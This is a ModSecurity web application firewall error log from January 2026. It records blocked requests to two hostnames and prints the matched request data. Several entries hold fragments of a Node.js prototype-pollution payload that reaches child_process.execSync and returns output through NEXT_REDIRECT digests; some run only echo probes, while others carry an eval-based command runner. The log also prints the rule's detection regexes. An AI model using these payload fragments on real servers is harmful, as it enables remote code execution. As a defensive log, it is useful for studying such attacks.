[Fri Jan 02 15:13:17.075348 2026] [:error] [pid 1142259] [client 46.34.163.65:15128] [client 46.34.163.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfTRVOXEaCAlm797DiQAAAAs"]
[Fri Jan 02 15:13:17.667651 2026] [:error] [pid 1139083] [client 46.34.163.65:15142] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfeZJXALhpgUTblBBhwAAAAE"]
[Fri Jan 02 15:13:17.667770 2026] [:error] [pid 1139083] [client 46.34.163.65:15142] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfeZJXALhpgUTblBBhwAAAAE"]
[Fri Jan 02 15:13:17.667838 2026] [:error] [pid 1139083] [client 46.34.163.65:15142] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfeZJXALhpgUTblBBhwAAAAE"]
[Fri Jan 02 15:13:17.668995 2026] [:error] [pid 1139083] [client 46.34.163.65:15142] [client 46.34.163.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfeZJXALhpgUTblBBhwAAAAE"]
[Fri Jan 02 15:13:17.669168 2026] [:error] [pid 1139083] [client 46.34.163.65:15142] [client 46.34.163.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfeZJXALhpgUTblBBhwAAAAE"]
[Fri Jan 02 15:17:05.225550 2026] [:error] [pid 1139158] [client 18.193.120.137:41358] [client 18.193.120.137] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVfTYRcfRGwFZiETM9WdYwAAAAY"]
[Fri Jan 02 15:17:05.226054 2026] [:error] [pid 1139158] [client 18.193.120.137:41358] [client 18.193.120.137] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVfTYRcfRGwFZiETM9WdYwAAAAY"]
[Fri Jan 02 15:17:05.226950 2026] [:error] [pid 1139158] [client 18.193.120.137:41358] [client 18.193.120.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVfTYRcfRGwFZiETM9WdYwAAAAY"]
[Fri Jan 02 15:17:05.227103 2026] [:error] [pid 1139158] [client 18.193.120.137:41358] [client 18.193.120.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVfTYRcfRGwFZiETM9WdYwAAAAY"]
[Sat Jan 03 12:00:57.936097 2026] [:error] [pid 1160893] [client 54.95.172.1:41906] [client 54.95.172.1] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aVj26cJhNYh2MCZ3q3U6WAAAAAY"]
[Sat Jan 03 12:00:57.936568 2026] [:error] [pid 1160893] [client 54.95.172.1:41906] [client 54.95.172.1] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aVj26cJhNYh2MCZ3q3U6WAAAAAY"]
[Sat Jan 03 12:00:57.937484 2026] [:error] [pid 1160893] [client 54.95.172.1:41906] [client 54.95.172.1] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aVj26cJhNYh2MCZ3q3U6WAAAAAY"]
[Sat Jan 03 12:00:57.937658 2026] [:error] [pid 1160893] [client 54.95.172.1:41906] [client 54.95.172.1] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aVj26cJhNYh2MCZ3q3U6WAAAAAY"]
[Sun Jan 04 03:59:01.565487 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Rule 7f7d58167898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.565572 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Rule 7f7d5815c760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.567183 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.567313 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Rule 7f7d57dadbf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.567461 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.567605 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.569337 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Rule 7f7d589df320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.569469 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Rule 7f7d589d6030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.575828 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 03:59:01.575975 2026] [:error] [pid 1182475] [client 206.189.50.147:47604] [client 206.189.50.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVnXdaYkxzi7ylOGbn4VLQAAAAQ"]
[Sun Jan 04 06:31:38.594803 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Rule 7f7d58167898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.594891 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Rule 7f7d5815c760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.596510 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.596632 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Rule 7f7d57dadbf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.596780 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.596915 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.598887 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Rule 7f7d589df320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
[Sun Jan 04 06:31:38.599032 2026] [:error] [pid 1183231] [client 209.38.216.98:37710] [client 209.38.216.98] ModSecurity: Rule 7f7d589d6030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVn7OpMJohAt-Vv-T4B6ogAAAAY"]
